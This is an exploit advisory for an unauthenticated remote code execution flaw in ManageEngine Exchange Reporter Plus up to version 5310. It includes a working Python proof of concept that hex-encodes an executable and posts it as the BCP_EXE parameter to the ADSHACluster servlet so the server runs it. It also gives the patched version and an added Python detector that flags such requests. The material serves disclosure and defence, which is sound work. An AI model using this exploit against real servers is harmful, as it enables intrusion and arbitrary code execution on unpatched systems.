ManageEngine Exchange Reporter Plus 5310 Remote Code Execution

2018.07.04
Credit: Kacper Szurek
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: ManageEngine Exchange Reporter Plus <= 5310 Unauthenticated RCE
# Date: 28-06-2018
# Software Link: https://www.manageengine.com/products/exchange-reports/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# YouTube: https://www.youtube.com/c/KacperSzurek
# Category: remote

1. Description

Java servlet `ADSHACluster` executes `bcp.exe` file which can be passed using `BCP_EXE` param.

https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html

2. Proof of Concept

```python
import urllib

file_to_execute = "calc.exe"
ip = "192.168.1.105"

def to_hex(s):
    lst = []
    for ch in s:
        hv = hex(ord(ch)).replace('0x', '')
        if len(hv) == 1:
            hv = '0'+hv
        lst.append(hv)

    return reduce(lambda x,y:x+y, lst)

print "ManageEngine Exchange Reporter Plus <= 5310"
print "Unauthenticated Remote Code Execution"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"
print "https://www.youtube.com/c/KacperSzurek"

params = urllib.urlencode({'MTCALL': "nativeClient", "BCP_RLL" : "0102", 'BCP_EXE': to_hex(open(file_to_execute, "rb").read())})
f = urllib.urlopen("http://{}:8181/exchange/servlet/ADSHACluster".format(ip), params)
if '{"STATUS":"error"}' in f.read():
    print "OK"
else:
    print "ERROR"
```

3. Solution:

Update to version 5311

https://www.manageengine.com/products/exchange-reports/release-notes.html
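For hosts that cannot be updated to 5311 immediately, the request shape in the description can be flagged at a reverse proxy or in captured traffic. The following is an added detection example in Python 3, not code from the advisory or from ManageEngine; the function name, the finding fields and the case-insensitive matching are assumptions made for the example, and the sample requests are constructed.

```python
from urllib.parse import urlsplit, parse_qs

SERVLET_PATH = "/exchange/servlet/adshacluster"  # path from the advisory, lower-cased
PARAM = "BCP_EXE"                                 # parameter named in the advisory


def inspect_request(method, target, body=""):
    """Return a finding dict when a request hands BCP_EXE to the servlet, else None."""
    url = urlsplit(target)
    # Drop path parameters (";jsessionid=...") and a trailing slash before comparing.
    path = url.path.split(";")[0].rstrip("/").lower()
    if path != SERVLET_PATH:
        return None
    # The parameter can arrive in the query string or in a urlencoded form body.
    params = parse_qs(url.query, keep_blank_values=True)
    for key, vals in parse_qs(body, keep_blank_values=True).items():
        params.setdefault(key, []).extend(vals)
    # Assumption: match the name case-insensitively to err on the side of alerting.
    payloads = [v for k, vs in params.items() if k.upper() == PARAM for v in vs]
    if not payloads:
        return None
    finding = {"method": method, "path": url.path, "param_len": len(payloads[0]),
               "hex": False, "pe_header": False}
    try:
        decoded = bytes.fromhex(payloads[0])
    except ValueError:
        return finding  # parameter present but not hex: still worth an alert
    finding["hex"] = True
    finding["pe_header"] = decoded[:2] == b"MZ"  # Windows executable magic
    return finding


# Constructed sample requests (method, target, body); not captured traffic.
SAMPLES = [
    ("POST", "/exchange/servlet/ADSHACluster",
     "MTCALL=nativeClient&BCP_RLL=0102&BCP_EXE=4d5a9000"),
    ("POST", "/exchange/servlet/ADSHACluster", "MTCALL=nativeClient"),
    ("GET", "/exchange/index.html", ""),
]

if __name__ == "__main__":
    for method, target, body in SAMPLES:
        print(target, "->", inspect_request(method, target, body))
```

Any non-`None` result for a request arriving from outside the administrative network is worth investigating, since the advisory describes the servlet as reachable without authentication.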

